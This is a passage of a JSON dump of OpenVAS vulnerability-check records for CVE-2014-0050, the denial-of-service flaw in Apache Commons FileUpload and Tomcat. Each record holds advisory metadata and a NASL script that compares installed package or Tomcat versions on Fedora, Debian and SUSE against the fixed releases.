\"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128505.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of apache-commons-fileupload\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-17T13:37:51", "references": ["http://xforce.iss.net/xforce/xfdb/90987", "http://www.exploit-db.com/exploits/31615", "http://blog.spiderlabs.com/2014/02/cve-2014-0050-exploit-with-boundaries-loops-without-boundaries.html", "http://secunia.com/advisories/56830"], "pluginID": "1361412562310804251", "description": "This host is running Apache Tomcat and is prone to denial of service\n vulnerability.", "edition": 5, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-03-24T00:00:00", "title": "Apache Tomcat Content-Type Header Denial Of Service Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Denial of Service", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2018-09-15T00:00:00", "id": "OPENVAS:1361412562310804251", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804251", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_tomcat_content_type_hdr_dos_vuln.nasl 35236 2014-03-24 15:09:34Z mar$\n#\n# Apache Tomcat Content-Type Header Denial Of Service Vulnerability\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804251\");\n script_version(\"$Revision: 11402 $\");\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-15 11:13:36 +0200 (Sat, 15 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-24 15:09:34 +0530 (Mon, 24 Mar 2014)\");\n script_name(\"Apache Tomcat Content-Type Header Denial Of Service Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_apache_tomcat_detect.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheTomcat/installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56830\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/90987\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31615\");\n script_xref(name:\"URL\", value:\"http://blog.spiderlabs.com/2014/02/cve-2014-0050-exploit-with-boundaries-loops-without-boundaries.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Tomcat and is prone to denial of service\n vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Get the installed version of Apache Tomcat with the help of detect NVT\n and check the version is vulnerable or not.\");\n script_tag(name:\"insight\", value:\"The flaw is due to an improper handling of Content-Type HTTP header for\n multipart requests\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to cause denial of\n service condition.\");\n script_tag(name:\"affected\", value:\"Apache Tomcat version 7.0.x before 7.0.51 and 8.0.0 before 8.0.2\");\n script_tag(name:\"solution\", value:\"Upgrade to 7.0.51, 8.0.2 or later,\n http://tomcat.apache.org\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_in_range( version:vers, test_version:\"7.0.0\", test_version2:\"7.0.50\" ) ||\n version_in_range( version:vers, test_version:\"8.0.0.RC1\", test_version2:\"8.0.1\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"7.0.51/8.0.2\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:55:27", "references": ["http://www.debian.org/security/2014/dsa-2856.html"], "pluginID": "1361412562310702856", "description": "It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.", "edition": 3, "reporter": "Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net", "published": "2014-02-07T00:00:00", "title": "Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310702856", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702856", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2856.nasl 9354 2018-04-06 07:15:32Z cfischer $\n# Auto-generated from advisory DSA 2856-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"libcommons-fileupload-java on Debian Linux\";\ntag_insight = \"The Commons FileUpload package makes it easy to add robust, high-performance,\nfile upload capability to your servlets and web applications.\";\ntag_solution = \"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.2.2-1+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.2-1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.1-1.\n\nWe recommend that you upgrade your libcommons-fileupload-java packages.\";\ntag_summary = \"It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702856\");\n script_version(\"$Revision: 9354 $\");\n script_cve_id(\"CVE-2014-0050\");\n script_name(\"Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2018-04-06 09:15:32 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value:\"2014-02-07 00:00:00 +0100 (Fri, 07 Feb 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2856.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:50:43", "references": ["2014:0548_1"], "pluginID": "1361412562310850747", "description": "Check the version of jakarta-commons-fileupload", "edition": 6, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-10-13T00:00:00", "title": "SuSE Update for jakarta-commons-fileupload SUSE-SU-2014:0548-1 (jakarta-commons-fileupload)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310850747", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850747", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_0548_1.nasl 8046 2017-12-08 08:48:56Z santu $\n#\n# SuSE Update for jakarta-commons-fileupload SUSE-SU-2014:0548-1 (jakarta-commons-fileupload)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850747\");\n script_version(\"$Revision: 8046 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:48:56 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 18:35:00 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for jakarta-commons-fileupload SUSE-SU-2014:0548-1 (jakarta-commons-fileupload)\");\n script_tag(name: \"summary\", value: \"Check the version of jakarta-commons-fileupload\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\n of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"\n This update fixes a security issue with\n jakarta-commons-fileupload:\n\n * bnc#862781: denial of service due to too-small buffer\n size used (CVE-2014-0050)\n\n Security Issue reference:\n\n * CVE-2014-0050\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050\");\n script_tag(name: \"affected\", value: \"jakarta-commons-fileupload on SUSE Linux Enterprise Server 11 SP3\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"SUSE-SU\", value: \"2014:0548_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"SLES11.0SP3\")\n{\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-fileupload\", rpm:\"jakarta-commons-fileupload~1.1.1~1.37.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-fileupload-javadoc\", rpm:\"jakarta-commons-fileupload-javadoc~1.1.1~1.37.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:54:34", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128499.html", "2014-2175"], "pluginID": "1361412562310867523", "description": "Check for the Version of apache-commons-fileupload", "edition": 4, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-02-20T00:00:00", "title": "Fedora Update for apache-commons-fileupload FEDORA-2014-2175", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310867523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867523", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2175\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867523\");\n script_version(\"$Revision: 9373 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:57:18 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:08:39 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2175\");\n\n tag_insight = \"The javax.servlet package lacks support for rfc 1867, html file\nupload. This package provides a simple to use api for working with\nsuch data. The scope of this package is to create a package of Java\nutility classes to read multipart/form-data within a\njavax.servlet.http.HttpServletRequest\n\";\n\n tag_affected = \"apache-commons-fileupload on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2175\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128499.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of apache-commons-fileupload\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:48:15", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128505.html", "2014-2183"], "pluginID": "867519", "description": "Check for the Version of apache-commons-fileupload", "edition": 2, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-02-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for apache-commons-fileupload FEDORA-2014-2183", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867519", "id": "OPENVAS:867519", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2183\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867519);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:05:45 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2183\");\n\n tag_insight = \"The javax.servlet package lacks support for rfc 1867, html file\nupload. This package provides a simple to use api for working with\nsuch data. The scope of this package is to create a package of Java\nutility classes to read multipart/form-data within a\njavax.servlet.http.HttpServletRequest\n\";\n\n tag_affected = \"apache-commons-fileupload on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2183\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128505.html\");\n script_summary(\"Check for the Version of apache-commons-fileupload\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:48:25", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128499.html", "2014-2175"], "pluginID": "867523", "description": "Check for the Version of apache-commons-fileupload", "edition": 2, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-02-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for apache-commons-fileupload FEDORA-2014-2175", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867523", "id": "OPENVAS:867523", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2175\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867523);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:08:39 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2175\");\n\n tag_insight = \"The javax.servlet package lacks support for rfc 1867, html file\nupload. This package provides a simple to use api for working with\nsuch data. The scope of this package is to create a package of Java\nutility classes to read multipart/form-data within a\njavax.servlet.http.HttpServletRequest\n\";\n\n tag_affected = \"apache-commons-fileupload on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2175\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128499.html\");\n script_summary(\"Check for the Version of apache-commons-fileupload\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:48:50", "references": ["http://www.debian.org/security/2014/dsa-2856.html"], "pluginID": "702856", "description": "It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.", "edition": 3, "reporter": "Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net", "published": "2014-02-07T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2017-07-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=702856", "id": "OPENVAS:702856", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2856.nasl 6663 2017-07-11 09:58:05Z teissa $\n# Auto-generated from advisory DSA 2856-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"libcommons-fileupload-java on Debian Linux\";\ntag_insight = \"The Commons FileUpload package makes it easy to add robust, high-performance,\nfile upload capability to your servlets and web applications.\";\ntag_solution = \"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.2.2-1+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.2-1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 